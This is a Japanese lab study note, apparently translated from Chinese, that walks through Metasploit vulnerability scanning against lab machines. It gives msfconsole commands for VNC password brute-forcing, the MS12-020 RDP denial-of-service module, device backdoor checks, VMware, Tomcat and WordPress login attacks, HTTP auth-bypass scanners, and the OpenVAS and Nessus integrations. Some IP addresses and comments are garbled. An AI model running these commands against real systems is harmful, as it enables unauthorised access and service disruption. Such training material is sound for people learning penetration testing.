Kali linux学習ノート(九十五)metasploit framework-弱点スキャン2020.4.27
前言
本節学習用msf弱点スキャン
1、準備
ターゲットマシンmetasploitable
IP:192.168.1.120
netstat -pantu |grep 5900 # vnc
ターゲットwinxp
リモートデスクトップはファイアウォールを開けてIPを消します:192.168.1.1122
ターゲットwin 7
リモートデスクトップはファイアウォールを開けてIPを消します:192.168.1.1.23
攻撃機カリ
IP:192.168.1.121
service postgresql start
netstat -pantu | grep 5432 #
msfconsole
2、vncパスワード解読
msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > show options
msf auxiliary(scanner/vnc/vnc_login) > set BLANK_PASSWORDS true
msf auxiliary(scanner/vnc/vnc_login) > set THREADS 20 #
msf auxiliary(scanner/vnc/vnc_login) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/vnc/vnc_login) > run
# ,
3、VNC無パスワードアクセス(パスワードが設定されていない)
これはサーバーの構成に問題があるので、試してみてください.
msf > use auxiliary/scanner/vnc/vnc_none_auth
msf auxiliary(scanner/vnc/vnc_none_auth) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/vnc/vnc_none_auth) > run
# , 1
4、RDPリモートデスクトップの脆弱性
非常に有名な脆弱性ms 12_020
msf > use auxiliary/scanner/rdp/ms12_020_check # DoS
msf auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 192.168.1.122 192.168.1.123
msf auxiliary(scanner/rdp/ms12_020_check) > run
# ,
msf >use auxiliary/dos/windows/rdp/ms12_020_maxchannelids # DoS
msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.122
msf auxiliary(ms12_020_maxchannelids) > run
#xp
msf auxiliary(ms12_020_maxchannelids) > set RHOSTS 192.168.1.123
msf auxiliary(ms12_020_maxchannelids) > run
#win7
5、設備裏口
msf > use auxiliary/scanner/ssh/juniper_backdoor #juniper , rhost
msf > use auxiliary/scanner/ssh/fortinet_backdoor #fortinet , rhost
6、VMware
#
msf > use auxiliary/scanner/vmware/vmauthd_login
msf auxiliary(vmauthd_login) > set BLANK_PASSWORDS true
msf auxiliary(vmauthd_login) > set RHOSTS 192.168.1.0/24
msf auxiliary(vmauthd_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/vmworks_common_20.txt
msf auxiliary(vmauthd_login) > set USERNAME root
msf auxiliary(vmauthd_login) > run
#
msf > use auxiliary/scanner/vmware/vmware_enum_vms
#
# WEB API
msf > use auxiliary/admin/vmware/poweron_vm
7、HTTP弱点スキャン
#
msf > use auxiliary/scanner/http/cert
msf auxiliary(scanner/http/cert) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/cert) > set THREADS 20
msf auxiliary(scanner/http/cert) > run
#
msf > use auxiliary/scanner/http/dir_listing
msf auxiliary(scanner/http/dir_listing) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/dir_listing) > set PATH dav
msf auxiliary(scanner/http/dir_listing) > run
msf auxiliary(scanner/http/dir_listing) > use auxiliary/scanner/http/files_dir
msf auxiliary(scanner/http/files_dir) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/files_dir) > run
#WebDAV Unicode
msf > use auxiliary/scanner/http/dir_webdav_unicode_bypass
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > set THREADS 20
msf auxiliary(scanner/http/dir_webdav_unicode_bypass) > run
#Tomcat
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/tomcat_mgr_login) > run
# HTTP
msf > use auxiliary/scanner/http/verb_auth_bypass
msf auxiliary(scanner/http/verb_auth_bypass) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/verb_auth_bypass) > run
#Wordpress
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(scanner/http/wordpress_login_enum) > set RHOSTS 192.168.1.120
msf auxiliary(scanner/http/wordpress_login_enum) > run
8、WMAP WEB応用スキャナー
sqlmapの働き方に基づいて開発されたプラグインwmap
msf > load wmap
msf > wmap_sites -h
msf > wmap_sites -a http://192.168.1.120
msf > wmap_targets -t http://192.168.1.120/mutillidae/index.php
msf > wmap_run -h
msf > wmap_run -t #
msf > wmap_run -e #
msf > wmap_vulns -l #
msf > vulns
9、openvas
コマンドラインモードは、構成が必要で、使用が面倒であるため、webインタフェース127.0.0.1/9392を使用してスキャンした後にndeフォーマットレポート1を生成する.nbe msfはnbeスキャンログ1をインポートする.nbe
msf > load openvas
msf > openvas_help
msf > db_import 1.nbe
msf > vulns
10、MSFは直接nessusを呼び出してスキャンを実行する
直接接続nessus
msf > load nessus
msf > nessus_help
msf > nessus_connect admin:[email protected]
msf > nessus_policy_list
msf > nessus_scan_new
msf > nessus_report_list